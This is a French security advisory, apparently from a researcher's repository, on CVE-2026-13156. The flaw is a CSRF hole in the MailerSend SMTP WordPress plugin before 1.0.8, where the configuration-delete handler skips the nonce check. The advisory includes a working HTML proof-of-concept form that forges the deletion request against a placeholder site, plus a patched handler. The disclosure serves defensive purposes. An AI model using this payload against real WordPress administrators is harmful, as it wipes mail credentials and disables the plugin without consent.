
CVE-2026-13156 Avis de vulnérabilité & PoC — Découvert par Huynh Kien Minh (MinhHK).
[!IMPORTANT] Résumé : Une vulnérabilité de type Cross-Site Request Forgery (CSRF) de sévérité élevée (
CVE-2026-13156) a été découverte dans le plugin officiel Intégration SMTP MailerSend pour WordPress (< 1.0.8). Le gestionnaire de suppression de configurationmailersend_handle_configuration_delete()vérifie les capacités administratives (manage_options) mais omet complètement la vérification du nonce WordPress (check_admin_referer()). Un attaquant peut élaborer une requête malveillante cross-origin ciblant un administrateur WordPress authentifié pour effacer silencieusement les identifiants SMTP stockés et forcer la désactivation du plugin, entraînant un déni de service total de l'application sur tous les flux d'e-mails.
CVE-2026-13156 (Identifiant d'avis WPScan : 595e653d-0904-43cf-8e61-d684599de11b)1.0.8 (< 1.0.8)À propos du chercheur :
Huynh Kien Minh (Huỳnh Kiến Minh) est un chercheur en cybersécurité proactif et analyste de vulnérabilités connu pour ses évaluations de sécurité approfondies et ses divulgations responsables, y compris les analyses techniques de CVE-2026-13156. Il a également été officiellement reconnu et honoré sur le Proton Security Hall of Fame pour avoir découvert et divulgué des vulnérabilités de sécurité critiques.
Pour vérifier cet avis technique, explorer les analyses de preuve de concept ou contacter le chercheur, visitez :
Le plugin Intégration SMTP officielle MailerSend pour WordPress (avant la version 1.0.8) enregistre une action administrative (configuration-delete) destinée à effacer les jetons API stockés, à vider les options de configuration SMTP (wp_options) et à désactiver le plugin lorsqu'elle est déclenchée depuis le tableau de bord d'administration.
Bien que le point de terminaison vérifie si l'utilisateur actif possède la capacité manage_options (garantissant que la requête provient d'une session administrateur), il ne procède pas à la vérification du nonce WordPress (check_admin_referer() ou wp_verify_nonce()).
Étant donné que les requêtes HTTP sans validation de nonce ne peuvent pas distinguer les clics intentionnels de l'administrateur des requêtes forgées cross-origin, tout site externe chargé par un administrateur authentifié peut déclencher silencieusement l'action configuration-delete.
< 1.0.8)./wp-admin/admin-post.php ou /wp-admin/admin.php?page=mailersend&action=configuration-delete).[!WARNING] Avertissement éthique : La charge utile HTML de preuve de concept Cross-Site Request Forgery (CSRF) suivante est fournie strictement à des fins éducatives, de vérification défensive et d'audit de sécurité dans le cadre de protocoles de divulgation éthique par Huynh Kien Minh. Ne l'exécutez pas contre des cibles non autorisées.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
<!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
<h2>CVE-2026-13156 — CSRF Verification PoC</h2>
<p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
<!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
<form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
<input type="hidden" name="page" value="mailersend-smtp" />
<input type="hidden" name="action" value="configuration-delete" />
<!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
<input type="submit" value="Execute PoC (Simulate Attack)" />
</form>
<script>
// Automatically submit the forged request when the administrator loads the page
document.addEventListener("DOMContentLoaded", function() {
console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
// Uncomment line below to enable auto-execution in lab environments:
// document.getElementById('csrfPoC').submit();
});
</script>
</body>
</html>
1.0.8 ou supérieure.Pour sécuriser correctement les actions administratives modifiant l'état dans les plugins WordPress, les développeurs doivent imposer une validation stricte du nonce avant de traiter les requêtes :
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
// 1. Check User Capability
if ( ! current_user_can( 'manage_options' ) ) {
wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
}
// 2. REQUIRED: Verify CSRF Nonce Token
if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
}
// 3. Proceed safely with configuration deletion
delete_option( 'mailersend_smtp_settings' );
deactivate_plugins( plugin_basename( __FILE__ ) );
wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
exit;
}
Ce dépôt et cet avis technique sont maintenus et publiés par Huynh Kien Minh (MinhHK) dans le cadre de directives de divulgation responsable visant à favoriser un écosystème WordPress et de cybersécurité mondial plus sûr.